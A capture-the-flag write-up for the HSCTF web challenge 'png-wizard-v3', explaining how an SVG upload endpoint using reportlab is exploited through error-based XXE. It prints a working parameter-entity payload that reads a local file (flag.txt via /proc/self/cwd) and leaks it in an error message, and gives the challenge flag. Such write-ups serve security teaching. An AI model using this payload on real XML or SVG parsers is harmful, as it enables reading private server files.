# Web Exploitation

| Challenge                | Link                            |
| ------------------------ | ------------------------------- |
| png-wizard-v3 (8 solves) | [Here](#png-wizard-v3-8-solves) |

## png-wizard-v3 (8 solves)

### Description

Now with support for modern image formats!

[http://png-wizard-v3.hsctf.com](http://png-wizard-v3.hsctf.com/)

### Solution

When we try to upload SVG file the response is `Error converting file: Unknown image kind .PNG`.  

<figure><img src="https://329253018-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIYUhWFsdATjBxpgp6f6z%2Fuploads%2FOplTMt2vvyUF3qJdSlNY%2Fimage.png?alt=media&#x26;token=3a6b3712-4f6f-4758-a9dd-ba099bb7ad51" alt=""><figcaption></figcaption></figure>

By checking on `reportlab 3.6.12` source code we can see that the error caused by invalid format/extension for saved file. Valid format should be PNG not .PNG .&#x20;

<figure><img src="https://329253018-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIYUhWFsdATjBxpgp6f6z%2Fuploads%2FCBxpuhTvIypdxOtst5Ti%2Fimage.png?alt=media&#x26;token=4dad8e83-07e4-4cbf-8995-4ffe03b3aadc" alt=""><figcaption></figcaption></figure>

Loooking at source code, we can see that there is XXE vulnerability while parsing the SVG data. But since we can't download the rendered file we can't do common XXE.

<figure><img src="https://329253018-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIYUhWFsdATjBxpgp6f6z%2Fuploads%2FaQRde6G0WEwgXmZvyMdc%2Fimage.png?alt=media&#x26;token=a6e7f116-4d72-4acf-85fa-4205037172e7" alt=""><figcaption></figcaption></figure>

Another information we have that there is error verbose indicating what is the caused of the error. So the idea is we try to use this error verbose to leak information from system. Payload reference : <https://balsn.tw/ctf_writeup/20190622-googlectfquals/>

<figure><img src="https://329253018-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIYUhWFsdATjBxpgp6f6z%2Fuploads%2FmaK6GJu3D7dwFmcDFOYI%2Fimage.png?alt=media&#x26;token=f6d4fb54-66ca-4e22-b736-44b14cc7fec8" alt=""><figcaption></figcaption></figure>

<figure><img src="https://329253018-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIYUhWFsdATjBxpgp6f6z%2Fuploads%2F03rjsgcssetE98nt5GrT%2Fimage.png?alt=media&#x26;token=ea1ebcf6-2864-4561-b668-5bcfbd507f9c" alt=""><figcaption></figcaption></figure>

```xml
<!DOCTYPE svg [ 
  <!ELEMENT message ANY >
  <!ENTITY % NUMBER '<!ENTITY &#x25; file SYSTEM "file:///proc/self/cwd/flag.txt">
  <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%NUMBER;
]><svg width="2048px" height="1024px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="40" x="40" y="40">&xxe;</text></svg>
```

Flag : flag{are\_you\_really\_a\_wizard\_if\_you\_dont\_use\_magick}